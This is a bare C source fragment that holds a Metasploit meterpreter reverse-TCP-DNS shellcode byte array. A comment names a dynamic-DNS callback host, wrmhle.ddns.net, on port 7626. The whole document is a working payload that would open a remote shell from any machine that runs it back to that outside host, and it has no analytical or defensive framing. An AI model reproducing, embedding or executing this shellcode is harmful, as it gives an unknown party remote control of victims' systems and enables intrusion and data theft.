/*
	meterpreter/reverse_tcp_dns LHOST=wrmhle.ddns.net LPORT=7626
*/
unsigned char buffer[] = 
"\xda\xdb\xd9\x74\x24\xf4\xba\x8f\x33\x8d\x11\x5b\x2b\xc9\xb1"
"\x5a\x31\x53\x17\x83\xc3\x04\x03\xdc\x20\x6f\xe4\x1e\xae\xed"
"\x07\xde\x2f\x92\x8e\x3b\x1e\x92\xf5\x48\x31\x22\x7d\x1c\xbe"
"\xc9\xd3\xb4\x35\xbf\xfb\xbb\xfe\x0a\xda\xf2\xff\x27\x1e\x95"
"\x83\x35\x73\x75\xbd\xf5\x86\x74\xfa\xe8\x6b\x24\x53\x66\xd9"
"\xd8\xd0\x32\xe2\x53\xaa\xd3\x62\x80\x7b\xd5\x43\x17\xf7\x8c"
"\x43\x96\xd4\xa4\xcd\x80\x39\x80\x84\x3b\x89\x7e\x17\xed\xc3"
"\x7f\xb4\xd0\xeb\x8d\xc4\x15\xcb\x6d\xb3\x6f\x2f\x13\xc4\xb4"
"\x4d\xcf\x41\x2e\xf5\x84\xf2\x8a\x07\x48\x64\x59\x0b\x25\xe2"
"\x05\x08\xb8\x27\x3e\x34\x31\xc6\x90\xbc\x01\xed\x34\xe4\xd2"
"\x8c\x6d\x40\xb4\xb1\x6d\x2b\x69\x14\xe6\xc6\x7e\x25\xa5\x8e"
"\xb3\x04\x55\x4f\xdc\x1f\x26\x7d\x43\xb4\xa0\xcd\x0c\x12\x37"
"\x31\x27\xe2\xa7\xcc\xc8\x13\xee\x0a\x9c\x43\x98\xbb\x9d\x0f"
"\x58\x43\x48\x9f\x08\xeb\x23\x60\xf8\x4b\x94\x08\x12\x44\xcb"
"\x29\x1d\x8e\x64\x41\xa1\x31\x8b\x92\x56\x40\xe6\xfa\xf4\xc1"
"\xd6\x9e\x60\x64\x54\x71\x06\x1d\xee\x8d\x8e\x85\x56\xd6\x76"
"\x6e\x3f\xbe\xde\xd6\xe7\x66\x86\xbe\x4f\xcf\x6e\x67\x28\xb7"
"\xd6\xcf\x90\x1f\xbe\xb7\x78\xf8\x66\x10\x21\xa0\xce\xf8\x89"
"\x08\xb6\xa0\x71\xf1\x1e\x09\xda\x59\xc6\xf1\x82\x59\x9e\xa8"
"\x1b\x6e\xde\x54\x8e\x05\x9e\xb6\x5b\x1f\x4e\xaf\x99\x1f\x73"
"\xe5\x17\xf9\xe1\xe9\x71\x51\x9d\x90\xdb\x29\x3c\x5c\xf6\x57"
"\x7e\xd6\xf5\xa8\x30\x1f\x73\xbb\xa4\xef\xce\xe1\x62\xef\xe4"
"\x8c\x8a\x65\x03\x07\xdd\x11\x09\x7e\x29\xbe\xf2\x55\x22\x77"
"\x67\x16\x5c\x78\x67\x96\x9c\x2e\xed\x96\xf4\x96\x55\xc5\xe1"
"\xd8\x43\x79\xba\x4c\x6c\x28\x6f\xc6\x04\xd6\x56\x20\x8b\x29"
"\xbd\xb0\xf7\xff\xfb\xc6\x19\x3c";
